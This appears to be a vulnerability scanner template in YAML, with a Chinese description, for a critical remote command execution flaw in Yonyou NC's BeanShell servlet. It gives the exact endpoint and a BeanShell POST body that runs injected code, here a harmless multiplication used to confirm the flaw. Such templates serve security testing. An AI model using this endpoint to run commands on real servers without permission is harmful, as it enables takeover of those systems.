漏洞描述
用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限 icon_hash="1085941792"
id: yonyou-nc-bsh-servlet-bshservlet-rce
info:
name: 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
author: B1anda0
severity: critical
verified: true
description: 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限 icon_hash="1085941792"
reference:
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
tags: yonyou,yonyounc,rce
created: 2023/06/26
set:
r1: randomInt(8000, 9999)
r2: randomInt(8000, 9999)
rules:
r0:
request:
method: POST
path: /servlet/~ic/bsh.servlet.BshServlet
body: bsh.script=print%28{{r1}}*{{r2}}%29%3B
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
expression: r0()